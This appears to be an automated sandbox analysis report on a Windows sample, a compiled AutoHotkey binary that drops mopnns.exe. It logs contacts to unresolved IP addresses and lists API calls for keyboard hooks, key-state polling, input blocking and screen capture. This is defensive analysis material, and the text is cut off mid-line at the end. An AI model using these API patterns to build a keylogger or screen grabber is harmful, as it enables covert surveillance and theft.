                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp | String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: rm9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: unknown | HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        Contains functionality to register a low level keyboard hook
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00409200 SetWindowsHookExW 0000000D,Function_00004BF0,00400000,00000000 | 0_2_00409200
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId | 0_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0043A490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC | 0_2_0043A490
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004013F4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW | 0_2_004013F4
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId | 0_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040F686 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,_free,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput | 0_2_0040F686

                        System Summary:

                        Sample or dropped binary is a compiled AutoHotkey binary
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Window found: window name: AutoHotkey
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004013F4 | 0_2_004013F4
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00408140 | 0_2_00408140
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004201C0 | 0_2_004201C0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040F250 | 0_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00442260 | 0_2_00442260
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00492262 | 0_2_00492262
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0048E2B0 | 0_2_0048E2B0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004183E0 | 0_2_004183E0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00482405 | 0_2_00482405
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0041C430 | 0_2_0041C430
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0043A490 | 0_2_0043A490
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0048949E | 0_2_0048949E
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0043F560 | 0_2_0043F560
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040C530 | 0_2_0040C530
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0049D58D | 0_2_0049D58D
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00482675 | 0_2_00482675
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00484620 | 0_2_00484620
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004966C5 | 0_2_004966C5
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004996AF | 0_2_004996AF
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_0040D770 | 0_2_0040D770
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00408C60 | 4_2_00408C60
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_0040DC11 | 4_2_0040DC11
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00407C3F | 4_2_00407C3F
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00418CCC | 4_2_00418CCC
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00406CA0 | 4_2_00406CA0
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_004028B0 | 4_2_004028B0
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_0041A4BE | 4_2_0041A4BE
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00418244 | 4_2_00418244
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00401650 | 4_2_00401650
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00402F20 | 4_2_00402F20
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_004193C4 | 4_2_004193C4
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00418788 | 4_2_00418788
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Code function: 4_2_00402F89 | 4_2_00402F89
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00402B904_2_00402